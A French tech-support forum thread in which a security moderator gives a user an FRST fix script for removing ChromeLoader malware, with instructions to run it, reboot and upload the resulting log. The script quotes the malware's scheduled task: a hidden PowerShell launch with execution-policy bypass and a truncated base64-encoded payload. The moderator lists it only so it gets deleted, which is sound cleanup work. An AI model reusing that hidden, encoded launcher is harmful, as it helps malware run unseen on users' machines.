Virus powershell

Merci pour la réponse voici les liens le premier c'est addition et le deuxième c'est FRST

https://www.cjoint.com/c/LAosP4HnZLf
https://www.cjoint.com/c/LAosQvfUc8f

Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :

Start::
CreateRestorePoint:
CloseProcesses:
Task: {9161CB5D-6553-406C-B909-2837E0B48F54} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAA7AAoACgAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAAL (l'élément de données a 1683 caractères en plus).
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2367141648-60646426-896892202-1001\...\Run: [bt] => "C:\Users\Hugo\AppData\Roaming\BitTorrent\BitTorrent.exe"  /MINIMIZED (Pas de fichier)
Task: {0C66BE56-6294-4EF3-A76E-1F5369B8CF1B} - System32\Tasks\RTSS => C:\Program Files (x86)\RivaTuner Statistics Server\RTSS.exe /s (Pas de fichier)
S3 WinRing0_1_2_0; C:\Users\Hugo\AppData\Local\Temp\tmp3E67.tmp [14544 2021-11-22] (Noriyuki MIYAZAKI -> OpenLibSys.org) 
FirewallRules: [TCP Query User{E440C2E8-53EE-4ECF-B740-FB55CB95FEFB}C:\program files (x86)\planet zoo\planetzoo.exe] => (Allow) C:\program files (x86)\planet zoo\planetzoo.exe => Pas de fichier
FirewallRules: [UDP Query User{1806A363-269E-4062-9FA6-21063EEE748E}C:\program files (x86)\planet zoo\planetzoo.exe] => (Allow) C:\program files (x86)\planet zoo\planetzoo.exe => Pas de fichier
FirewallRules: [{C34E6EA7-D644-4634-B12D-E52C3C6E16F1}] => (Allow) C:\Users\Hugo\AppData\Roaming\BitTorrent\BitTorrent.exe => Pas de fichier
FirewallRules: [{D0BD4AD8-A8E8-43C1-91EC-7D17F94C6255}] => (Allow) C:\Users\Hugo\AppData\Roaming\BitTorrent\BitTorrent.exe => Pas de fichier
FirewallRules: [TCP Query User{4AF2CEAD-A96F-404F-A4A1-BB0EEFFE9023}C:\users\hugo\downloads\bus_simulator_18\bus.simulator.18-c000005\bus simulator 18\bussimulator18\binaries\win64\bussimulator18-win64-shipping.exe] => (Allow) C:\users\hugo\downloads\bus_simulator_18\bus.simulator.18-c000005\bus simulator 18\bussimulator18\binaries\win64\bussimulator18-win64-shipping.exe => Pas de fichier
FirewallRules: [UDP Query User{598E258C-72BF-4E9A-BDED-EFE5D66B2EAE}C:\users\hugo\downloads\bus_simulator_18\bus.simulator.18-c000005\bus simulator 18\bussimulator18\binaries\win64\bussimulator18-win64-shipping.exe] => (Allow) C:\users\hugo\downloads\bus_simulator_18\bus.simulator.18-c000005\bus simulator 18\bussimulator18\binaries\win64\bussimulator18-win64-shipping.exe => Pas de fichier
FirewallRules: [TCP Query User{B8A2AD1F-2FB5-48D5-B39D-3E9E066107F3}C:\users\hugo\downloads\planet zoo by stg gege\planet zoo by stg gege\planetzoo.exe] => (Allow) C:\users\hugo\downloads\planet zoo by stg gege\planet zoo by stg gege\planetzoo.exe => Pas de fichier
FirewallRules: [UDP Query User{4E9F0F16-7F8B-4922-A2B1-B77A10458513}C:\users\hugo\downloads\planet zoo by stg gege\planet zoo by stg gege\planetzoo.exe] => (Allow) C:\users\hugo\downloads\planet zoo by stg gege\planet zoo by stg gege\planetzoo.exe => Pas de fichier
FirewallRules: [TCP Query User{A94467E4-929E-47C8-A753-E88A014541F0}C:\games\star wars jedi fallen order\swgame\binaries\win64\starwarsjedifallenorder.exe] => (Allow) C:\games\star wars jedi fallen order\swgame\binaries\win64\starwarsjedifallenorder.exe => Pas de fichier
FirewallRules: [UDP Query User{53EFC35B-E201-4D50-B6EA-A13DA95A636C}C:\games\star wars jedi fallen order\swgame\binaries\win64\starwarsjedifallenorder.exe] => (Allow) C:\games\star wars jedi fallen order\swgame\binaries\win64\starwarsjedifallenorder.exe => Pas de fichier
FirewallRules: [{95E7EE52-6739-405E-9023-632597D1928B}] => (Allow) C:\Program Files (x86)\Electronic Arts\BioWare\Star Wars - The Old Republic\launcher.exe => Pas de fichier
FirewallRules: [{CE9C9719-88C4-4EB2-9991-41590B0B7C8C}] => (Allow) C:\Program Files (x86)\Electronic Arts\BioWare\Star Wars - The Old Republic\launcher.exe => Pas de fichier
FirewallRules: [{BACBC675-C643-4CBB-8736-BC85493F2212}] => (Allow) C:\Program Files (x86)\Electronic Arts\BioWare\Star Wars - The Old Republic\launcher.exe => Pas de fichier
FirewallRules: [{218BE678-47FF-4DCE-9481-F083E9933F8B}] => (Allow) C:\Program Files (x86)\Electronic Arts\BioWare\Star Wars - The Old Republic\launcher.exe => Pas de fichier
FirewallRules: [TCP Query User{3EE7362C-01B1-4CF0-AC1A-DFD30CDDE330}C:\games\farming simulator 22\x64\farmingsimulator2022game.exe] => (Allow) C:\games\farming simulator 22\x64\farmingsimulator2022game.exe => Pas de fichier
FirewallRules: [UDP Query User{1F7C6235-465E-4BB0-A5A7-4B76DCF59BD3}C:\games\farming simulator 22\x64\farmingsimulator2022game.exe] => (Allow) C:\games\farming simulator 22\x64\farmingsimulator2022game.exe => Pas de fichier
FirewallRules: [TCP Query User{20DA6D4B-5B7F-40B6-A822-6AC9B0E58C51}C:\users\hugo\downloads\feed.and.grow.fish.v0.14.3.5\feed.and.grow.fish.v0.14.3.5\feed.and.grow.fish.v0.14.3.5\feed and grow.exe] => (Allow) C:\users\hugo\downloads\feed.and.grow.fish.v0.14.3.5\feed.and.grow.fish.v0.14.3.5\feed.and.grow.fish.v0.14.3.5\feed and grow.exe => Pas de fichier
FirewallRules: [UDP Query User{CC430B78-E975-40D7-8D75-AF050FD01A59}C:\users\hugo\downloads\feed.and.grow.fish.v0.14.3.5\feed.and.grow.fish.v0.14.3.5\feed.and.grow.fish.v0.14.3.5\feed and grow.exe] => (Allow) C:\users\hugo\downloads\feed.and.grow.fish.v0.14.3.5\feed.and.grow.fish.v0.14.3.5\feed.and.grow.fish.v0.14.3.5\feed and grow.exe => Pas de fichier
FirewallRules: [TCP Query User{B3D290B3-6391-42B2-904C-8FA255156333}C:\users\hugo\desktop\bus_simulator_18\bus.simulator.18-c000005\bus simulator 18\bussimulator18\binaries\win64\bussimulator18-win64-shipping.exe] => (Allow) C:\users\hugo\desktop\bus_simulator_18\bus.simulator.18-c000005\bus simulator 18\bussimulator18\binaries\win64\bussimulator18-win64-shipping.exe => Pas de fichier
FirewallRules: [UDP Query User{4576235B-3DD7-4040-9631-24A6D780268C}C:\users\hugo\desktop\bus_simulator_18\bus.simulator.18-c000005\bus simulator 18\bussimulator18\binaries\win64\bussimulator18-win64-shipping.exe] => (Allow) C:\users\hugo\desktop\bus_simulator_18\bus.simulator.18-c000005\bus simulator 18\bussimulator18\binaries\win64\bussimulator18-win64-shipping.exe => Pas de fichier
C:\Windows\system32\Tasks\ChromeLoader
Hosts:
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.



Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

IMPORTANT une fois ton ordinateur redémarré :

4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.

5- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT

Pour info :

Tu as désinstallé Google Chome si tu souhaites le réinstaller fait-le avec CE LOGICIEL en cliquant sur Réinitialiser Google Chrome.

.
bazfile
Modérateur/Contributeur sécurité.
un bonjour, une réponse, un merci font toujours plaisir.